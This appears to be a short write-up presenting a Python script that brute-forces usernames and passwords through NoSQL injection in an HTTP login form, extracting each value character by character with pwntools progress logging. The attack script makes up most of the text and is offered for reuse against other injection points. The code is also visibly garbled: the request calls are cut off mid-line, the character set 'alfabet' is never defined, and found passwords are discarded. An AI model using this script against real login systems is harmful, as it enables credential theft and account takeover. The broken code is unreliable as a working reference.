Below you will find a bruteforcer for HTTP based NoSQL injections. Obviously, this code is easily adjusted to any type of injection attack through HTTP.

The code will start by iterating over the alphabet, digits and punctuation characters. When a username is found that starts with one of them, through check_username, the rest of the username is brute forced in brute_username. When completing the username, the user's password is also attacked using brute_password.

All characters are escaped using re.escape instead of using a blacklist. A smart builder will put regular expression characters into a bruteforcible password to make it a little harder.

The pwntools library is used to provide logging and animations.

import requests
import string
import re
from pwn import *

p1 = log.progress("Brute Force")
p1.status("Brute forcing...")

p2 = log.progress("Username")
p3 = log.progress("Password")


def check_username(username):
    resp ="",
                               "login":"login" })

    if b"Under Plantation" in resp.content:
        return True
    return False

def brute_username(found):
    for c in alfabet:
        p1.status(f"Trying with the {c} character")
        if check_username(found+c):
            return brute_username(found+c)

    passwd = brute_password(found,"")

def brute_password(username,found):
    for c in alfabet:
        p1.status(f"Trying with the {c} character")
        resp ="",
                                   "login":"login" })

        if b"Under Plantation" in resp.content:
            return brute_password(username, found+c)
    return found

for c in alfabet:
    if check_username(c):
        p2 = log.progress("Username")
        p3 = log.progress("Password")